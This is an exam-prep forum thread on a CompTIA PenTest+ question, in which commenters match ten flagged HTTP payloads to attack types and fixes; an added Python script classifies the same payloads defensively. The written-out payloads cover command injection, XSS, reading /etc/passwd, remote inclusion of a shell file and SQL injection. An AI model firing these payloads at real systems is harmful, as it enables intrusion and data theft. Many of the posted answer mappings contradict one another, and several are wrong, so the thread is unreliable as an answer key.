
Exam PT0-002 topic 1 question 63 discussion

Actual exam question from CompTIA's PT0-002
Question #: 63
Topic #: 1

HOTSPOT -
You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTION -
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

Suggested Answer:

Comments

Arox08
Highly Voted 1 year, 1 month ago
whoami — cmd inj — input san (),{}
Search Bob — Ref XSS — input san <>
Logfile passwd00 — Local file inc. — input san sandbox
Innertab — DOM XSS — input san <>
Site=exaping — cmd inj — input san sandbox
Redir — URL Redirect — prevent ext calls
Delay — Stacked — param queries
Union — Union — param queries
+convert — Error — param queries
Logfile…shell.txt — remote file inclusion — input san sandbox
upvoted 31 times
OnA_Mule
1 year ago
This is the closest to being correct. My only issue is the remediation for site=exa'ping...the remediation should be Input Sanitation using an answer that has single quote. The sandbox option doesn't appear to sanitize the single quote. So I think this one should be the Input Sanitation ", ', <, :, >, -, The other one seems to start with a single quote, but I'm guessing that's supposed to be a backtick instead of a single quote.
upvoted 4 times
KingIT_ENG
1 year, 1 month ago
must what you think? inner Tab ===== Reflective XX
upvoted 1 times
KingIT_ENG
1 year, 1 month ago
Inner Tab ? not Ref XSS Search BOB ? DOM XSS
upvoted 1 times
[Removed]
1 year, 1 month ago
whoami - Cmd inj - input san (),{}
Search Bob - Local file inc. - input san sandbox
Logfile passwd00 - remote file inclusion - input san sandbox
Innertab - Ref XSS - input san <>
Site=exaping - SQL Union - param queries
Redir - SQL Error - param queries
Delay - SQL Stacked - param queries
Union - DOM XSS - input san <>
+convert - cmd inj - input san sandbox
Logfile…shell.txt - URL Redirect - prevent ext calls
This is the right answer
upvoted 2 times
yeahnodontthinkso
4 days, 10 hours ago
This comes straight from my school, different order than this, sorry:
lookup=$(whoami) | Command Injection | Input San $,{},{}
search=Bob | Reflected XSS | Input San <>
#inner-tab | DOM-Based XSS | Input San <>
site=www.exa'ping | Command Injection | Input San <>
item=widget | SQL Stacked | Parameterized Queries
logfile=fetch passwd | Local File Inclusion | Input San Sandbox
logfile=httpwww.malicious-site.com | Remote File Inclusion | Input San Sandbox
item=widget union select | SQL Inj Union Based | Parameterized Queries
redir=http www.malicious-site.com | URL Redirect | Preventing External Calls
item=widget'+convert | SQL injection Error Based | Parameterized Queries
upvoted 1 times
KingIT_ENG
1 year, 1 month ago
Inner Tab ? not Ref XSS Search BOB ? DOM XSS
upvoted 1 times
KingIT_ENG
1 year, 1 month ago
confused between Inner Tab and Search BOB
upvoted 1 times
Wabs__
Highly Voted 1 year, 7 months ago
Question 7 https://www.examtopics.com/exams/comptia/pt1-002/view/
upvoted 9 times
2Fish
1 year, 2 months ago
1. Dom XSS - input san. <,> https://portswigger.net/web-security/cross-site-scripting/dom-based
2. SQLi Stacked - Parameterized Queries
3. SQLi Union - Parameterized Queries
4. Reflected XSS - input san <,> https://portswigger.net/web-security/cross-site-scripting/reflected
5. SQLi Error - Parameterized Queries https://www.indusface.com/blog/types-of-sql-injection/#Error_Based_SQL_Injection
6. CMD Injection - Input San. \ , / Sandbox
7. URL Redirect - Prevent ext. calls
8. local file inclusion - Input san. \ , / Sandbox
9. CMD Injection - input san. {,},(,)
10. Remote File Inclusion - input san. \ , / Sandbox
upvoted 1 times
[Removed]
1 year, 2 months ago
correct answer is
1. Reflected XSS - Input sanitization (<> ...)
2. Sql Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - parametrized queries
7. SQLi error - parametrized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input saniti $
10. URL redirect - prevent external calls
upvoted 1 times
shakevia463
1 year, 2 months ago
Reflected XSS, where the malicious script comes from the current HTTP request. Stored XSS, where the malicious script comes from the website's database. DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.
upvoted 1 times
[Removed]
1 year, 2 months ago
What is the correct answer, 100%?
upvoted 1 times
shakevia463
1 year, 2 months ago
The order is different on pt0-002 vs pt1-002; this is not right.
upvoted 3 times
bracokey
Most Recent 5 months, 1 week ago
lookup=$(whoami) Match: Command Injection
search-Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e Match: DOM-based Cross Site Scripting (XSS)
logfile=%2fetc%2fpasswd%00 Match: Local File Inclusion (LFI)
#inner-tab"><script>alert(1)</script> Match: Reflected Cross Site Scripting (XSS)
site=www.exa 'ping%20-c%2010%20localhost 'mple.com Match: Command Injection (Attempt to execute ping command)
redir=http:%2f%2fwww.malicious-site.com Match: URL Redirect
item=widget'; wait for%20delay20' 00:00:20';-- Match: SQL Injection (Stacked) (Attempt to use wait for and delay)
item=widget%20union%20select%20null, null, @@version; -- Match: SQL Injection (Union)
item=widget' +convert (int, @@version) +' Match: SQL Injection (Error)
logFile-http:%2f%2fww.malicious-site.com%2fshell.txt Match: Remote File Inclusion (RFI)
upvoted 3 times
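An added example, not from the question or from any commenter: a small signature-based triage script that URL-decodes each of the ten flagged payloads quoted in this thread and maps it to the attack type and remediation option the question offers, following the most-upvoted mapping (Arox08). The DOM-based versus reflected split cannot be read from the payload alone; the script uses the fact that a URL fragment (#...) never reaches the server as the deciding heuristic. The rule order, the regexes, the normalised remediation wording and the restored percent-encoding in the sample list are my own assumptions.

```python
import re
from urllib.parse import unquote
# Remediation options as the question lists them (wording lightly normalised).
PARAM = "Parameterized queries"
PATH_SAN = "Input sanitization of .., \\, / and sandboxed requests"
SHELL_SAN = "Input sanitization of `, :, $, {, }, (, )"
HTML_SAN = "Input sanitization of \", ', <, :, >, -"

# (attack type, remediation, signature). Order matters: the SQL and file
# inclusion rules must fire before the broader XSS and shell rules.
RULES = [
    ("SQL Injection (Stacked)", PARAM,
     re.compile(r";\s*(waitfor|exec|drop|insert|update|delete)\b", re.I)),
    ("SQL Injection (Union)", PARAM, re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("SQL Injection (Error)", PARAM, re.compile(r"'\s*\+\s*convert\s*\(", re.I)),
    ("Remote File Inclusion", PATH_SAN, re.compile(r"^\w*file\w*=\s*(https?|ftp):", re.I)),
    ("Local File Inclusion", PATH_SAN, re.compile(r"\.\./|/etc/|\\windows\\|\x00", re.I)),
    ("URL Redirect", "Preventing external calls",
     re.compile(r"^(redir\w*|url|next|return|goto)=\s*(https?:)?//", re.I)),
    # A payload in the URL fragment (#...) never reaches the server, so it can
    # only execute through client-side DOM code: that is what makes it DOM-based.
    ("DOM-based Cross Site Scripting", HTML_SAN, re.compile(r"^#.*(<\w|\bon\w+\s*=)", re.I)),
    ("Reflected Cross Site Scripting", HTML_SAN, re.compile(r"<\w|\bon\w+\s*=", re.I)),
    ("Command Injection", SHELL_SAN, re.compile(r"\$\(|`|\$\{")),
]

def classify(request: str) -> tuple[str, str]:
    """Return (attack type, remediation) for one query-string fragment.
    Decode first so %2f, %3c, %00 and friends cannot hide a signature."""
    decoded = unquote(request)
    for attack, remediation, signature in RULES:
        if signature.search(decoded):
            return attack, remediation
    return "Unclassified", "Manual review"

# Constructed sample: the ten flagged payloads from the question, with the
# obvious percent-encoding restored where the thread's copy was garbled.
FLAGGED = [
    "lookup=$(whoami)",
    'search=Bob"%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e',
    "logfile=%2fetc%2fpasswd%00",
    '#inner-tab"><script>alert(1)</script>',
    "site=www.exa`ping%20-c%2010%20localhost`mple.com",
    "redir=http:%2f%2fwww.malicious-site.com",
    "item=widget';waitfor%20delay%20'00:00:20';--",
    "item=widget%20union%20select%20null,null,@@version;--",
    "item=widget'+convert(int,@@version)+'",
    "logFile=http:%2f%2fwww.malicious-site.com%2fshell.txt",
]

if __name__ == "__main__":
    for payload in FLAGGED:
        attack, fix = classify(payload)
        print(f"{payload[:48]:<48} | {attack:<32} | {fix}")
```

Run directly it prints a triage table; a request no rule matches falls through to manual review rather than a guessed label.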
ciguy935yaknow
11 months, 3 weeks ago
Hey people so I found this online and I believe these to be the right answers. Any thoughts? https://quizlet.com/566527441/that-one-question-flash-cards/
upvoted 5 times
cy_analyst
1 year, 1 month ago
An answer with comments: https://www.evernote.com/shard/s8/sh/d6d72fe5-39a7-0fdd-7656-92529df14cd1/TaNnGhzwJ6NU8YRo5c-u-fYZDyZn4ld3KmejIGmWT6TgVrtPej-UBLOZAA
upvoted 2 times
OnA_Mule
1 year ago
Your link is not valid
upvoted 1 times
KingIT_ENG
1 year, 1 month ago
I think this is the correct:
Command Injection - input saniti $
DOM XSS - Input Sanitization (<> ...)
Local File Inclusion - sandbox req
Reflected XSS - Input sanitization (<> ...)
Command Injection - sandbox req
URL redirect - prevent external calls
Sql Injection Stacked - Parameterized Queries
SQLi union - parametrized queries
SQLi error - parametrized queries
Remote File Inclusion - sandbox
upvoted 1 times
KingIT_ENG
1 year, 1 month ago
Inner Tab - Must - Reflected XSS - Input sanitization (<> ...)
Search BOB - Must - DOM XSS - Input Sanitization (<> ...)
upvoted 1 times
mitrany2
1 year, 1 month ago
1. Command Injection - input saniti $
2. Reflected XSS - Input sanitization (<> ...)
3. Local File Inclusion - sandbox req
4. DOM XSS - Input Sanitization (<> ...)
5. Command Injection - sandbox req
6. URL redirect - prevent external calls
7. Sql Injection Stacked - Parameterized Queries
8. SQLi union - parametrized queries
9. SQLi error - parametrized queries
10. Remote File Inclusion - sandbox
upvoted 6 times
[Removed]
1 year, 1 month ago
Command Injection - input saniti $
Local File Inclusion - sandbox req
Remote File Inclusion - sandbox req
Reflected XSS - Input sanitization (<> ...)
SQLi union - parametrized queries
SQLi error - parametrized queries
Sql Injection Stacked - Parameterized Queries
DOM XSS - Input Sanitization (<> ...)
Command Injection - sandbox req
URL redirect - prevent external calls
upvoted 2 times
[Removed]
1 year, 1 month ago
This is right answer for sure https://www.examtopics.com/user/DrChats/
upvoted 1 times
[Removed]
1 year, 1 month ago
Wrong this payload
upvoted 1 times
KingIT_ENG
1 year, 1 month ago
Inner Tab ? not Ref XSS Search BOB ? DOM XSS
upvoted 1 times
[Removed]
1 year, 1 month ago
In command injection, not Parameterized Queries. Parameterized Queries are just for SQL.
upvoted 1 times
[Removed]
1 year, 1 month ago
The correct answer is
1 = lookup=$ (whoami) | Command Injection | Input Sanitization ‘,:,$,{,}(,),
2 = search=Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e | Local file inclusion | Input Sanitization ..,\,/,sandbox requests
3 = logfile=%2fetc%2fpasswd%00 | Remote file inclusion | Input Sanitization ..,\,/,sandbox requests
upvoted 1 times
OnA_Mule
1 year ago
Not sure why you keep posting the incorrect answer. Almost all of your answers are incorrect. See Arox08 for the correct answers.
upvoted 1 times
[Removed]
1 year, 1 month ago
4 = #inner-tab"><script>alert(1)</script> | Reflected Cross Site Scripting | Input Sanitization ",',<,:,>,-
upvoted 1 times
[Removed]
1 year, 1 month ago
5 = site=www.exaping%20-c%2010%20localhostmple.com | SQL Injection (Union) | Parametrized queries
upvoted 1 times
[Removed]
1 year, 1 month ago
6 = redir=http:%2f%2fwww.malicious-site.com | SQL Injection (Error) | Parametrized queries
upvoted 1 times
[Removed]
1 year, 1 month ago
7 = item=widget';waitfor%20delay20'00:00:20';-- | SQL Injection (Stacked) | Parametrized queries
upvoted 1 times
[Removed]
1 year, 1 month ago
10 = logFile=http:%2f%2fwww.malicious-site.com%2fshell.txt | URL Redirect | Preventing external calls
upvoted 1 times
cy_analyst
1 year, 1 month ago
This is a link that has an assessment from chatGPT about the payloads, vuln type and remediations. Enjoy: https://www.evernote.com/shard/s8/sh/c13cd49b-23b8-002d-88cc-2619e2b795e1/2a97bade0397f24deda20eb3f3a9a4ee
upvoted 1 times
[Removed]
1 year, 1 month ago
This is so wrong, check again
upvoted 1 times
cy_analyst
1 year, 1 month ago
lookup=$ (whoami) | Command Injection | Parametrized queries
search=Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e | DOM-based Cross Site Scripting | Input Sanitization ",',<,:,>,-
logfile=%2fetc%2fpasswd%00 | Local File Inclusion | Input Sanitization ..,,/,sandbox requests
#inner-tab"><script>alert(1)</script> | Reflected Cross Site Scripting | Input Sanitization ",',<,:,>,-
site=www.exaping%20-c%2010%20localhostmple.com | Command Injection | Input Sanitization ‘,:,$,{,}(,)
redir=http:%2f%2fwww.malicious-site.com | URL Redirect | Input Sanitization ‘,:,$,{,}(,)
item=widget';waitfor%20delay20'00:00:20';-- | SQL Injection (Stacked) | Parametrized queries
item=widget%20union%20select%20null,null,@@version;-- | SQL Injection (Union) | Parametrized queries
item=widget'+convert(int,@@version)+' | SQL Injection (Error) | Parametrized queries
logFile-http:%2f%2fww.malicious-site.com%2fshell.txt | Remote File Inclusion | Preventing external calls
upvoted 2 times
cy_analyst
1 year, 1 month ago
I'm sharing this for a bit. This is the best answer I could get. https://www.evernote.com/shard/s8/sh/c13cd49b-23b8-002d-88cc-2619e2b795e1/Tqvp1hUjW9ZeiEwTM199g6Z6gvJnh5tFg65HJzEBqcGKdx34XNzc4vGiiw
upvoted 1 times
cy_analyst
1 year, 1 month ago
If someone needs the query, please ask.
upvoted 1 times
scweeb
9 months ago
Can I get access?
upvoted 1 times
biggydanny
1 year ago
May I please have a look at your query
upvoted 1 times
KingIT_ENG
1 year, 1 month ago
You're correct, but lookup=$ (whoami) | Command Injection is not Parametrized queries; Input Sanitization ‘,:,$,{,}(,) is right.
upvoted 3 times
[Removed]
1 year, 2 months ago
100% correct answer. I manage these questions with answers.
upvoted 1 times
[Removed]
1 year, 2 months ago
After a lot of searching, the correct answer is
upvoted 1 times
[Removed]
1 year, 2 months ago
lookup=$ (whoami) : Command injection : Input Sanitization ‘,:,$,{,}(,),
upvoted 2 times
[Removed]
1 year, 2 months ago
search=Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e : Local file inclusion : Input Sanitization ..,\,/,sandbox requests
upvoted 1 times
[Removed]
1 year, 2 months ago
logfile=%2fetc%2fpasswd%00 : Remote file inclusion : Input Sanitization ..,\,/,sandbox requests
upvoted 1 times
[Removed]
1 year, 2 months ago
#inner-tab"><script>alert(1)</script> : Reflected Cross Site Scripting : Input Sanitization ",',<,:,>,-,
upvoted 1 times
[Removed]
1 year, 2 months ago
logFile-http:%2f%2fww.malicious-site.com%2fshell.txt : URL Redirect : Preventing external calls
upvoted 1 times
cy_analyst
1 year, 2 months ago
For anyone who wants to use as a question for example to chatGPT or anywhere else:
VULNERABILITY TYPE
Command Injection
DOM-based Cross Site Scripting
SQL Injection (Error)
SQL Injection (Stacked)
SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect
REMEDIATION
Parametrized queries
Preventing external calls
Input Sanitization ..,\,/,sandbox requests
Input Sanitization ‘,:,$,{,}(,),
Input Sanitization ",',<,:,>,-,
PAYLOADS
lookup=$ (whoami)
search=Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e
logfile=%2fetc%2fpasswd%00
#inner-tab"><script>alert(1)</script>
site=www.exa`ping%20-c%2010%20localhost`mple.com
redir=http:%2f%2fwww.malicious-site.com
item=widget';waitfor%20delay20'00:00:20';--
item=widget%20union%20select%20null,null,@@version;--
item=widget'+convert(int,@@version)+'
logFile-http:%2f%2fww.malicious-site.com%2fshell.txt
upvoted 4 times
[Removed]
1 year, 2 months ago
Parametrized queries is for SQL types not for command Injections
upvoted 1 times
[Removed]
1 year, 2 months ago
Can you sort this payload? inner tab is Reflected Cross Site Scripting, search=Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e is DOM-based Cross Site Scripting. I think it's the right sort.
upvoted 1 times
funkhaus
1 year, 2 months ago
The discussion can mess you up.. This is what I'm going with look$ - see CI $ BOB reflection >< logfile-fetch - LOCAL fi\e shell.txt - Remote fi\e script script DoubleX>< exam\\\\\ple CI union -p-union-q item-convert -p-error-q 20delay20 -p-stack-q redirect - URL redirect CALL
upvoted 1 times
funkhaus
1 year, 2 months ago
Just verified error.. I'm going with this simplified look$ - see CI $ exam\\\\\ple CI BOB DouBleX>< script script reflection >< logfile-fetch - LOCAL fi\e shell.txt - Remote fi\e redirect - URL redirect CALL union -p-union-q item-convert -p-error-q 20delay20 -p-stack-q
upvoted 2 times
[Removed]
1 year, 2 months ago
wrong this answer
upvoted 1 times
[Removed]
1 year, 2 months ago
This is 100% correct?
upvoted 1 times
[Removed]
1 year, 2 months ago
Inner Tab script= must first reflectionxx
upvoted 1 times
funkhaus
1 year, 2 months ago
You are right.. so Bob would be DOM based XSS attack?
upvoted 1 times
[Removed]
1 year, 2 months ago
I add the question numbers here and you go to every question when I comment the number here and answer the questions, and I also add my answer. It's very helpful. What is your idea?
upvoted 1 times
[Removed]
1 year, 2 months ago
Let's go on these questions to a lot of comments and I add those question numbers; please check and share your answer, and I also share my answer to help together.
upvoted 1 times
Mr_BuCk3th34D
1 year, 4 months ago
1. Dom XSS - input san. <,> https://portswigger.net/web-security/cross-site-scripting/dom-based
2. SQLi Stacked - Parameterized Queries
3. SQLi Union - Parameterized Queries
4. Reflected XSS - input san <,> https://portswigger.net/web-security/cross-site-scripting/reflected
5. SQLi Error - Parameterized Queries https://www.indusface.com/blog/types-of-sql-injection/#Error_Based_SQL_Injection
6. CMD Injection - Input San. /,\ Sandbox
7. URL Redirect - Prevent ext. calls
8. local file inclusion - Input san. /,\ Sandbox
9. CMD Injection - input san. [,],(,)
10. Remote File Inclusion - input san. /,\ Sandbox
upvoted 2 times
[Removed]
1 year, 4 months ago
correct answer is
1. Reflected XSS - Input sanitization (<> ...)
2. Sql Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - parametrized queries
7. SQLi error - parametrized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input saniti $
10. URL redirect - prevent external calls
upvoted 2 times
biggydanny
1 year ago
Did you finally narrow it down to this?
upvoted 1 times
OnA_Mule
1 year ago
See Arox08 for the correct answer. I think abdulrishad is trolling since he's posted 3 or 4 different answers over the past few months.
upvoted 1 times
RightAsTain
1 year, 7 months ago
This one is all messed up. Not sure what is what.
upvoted 5 times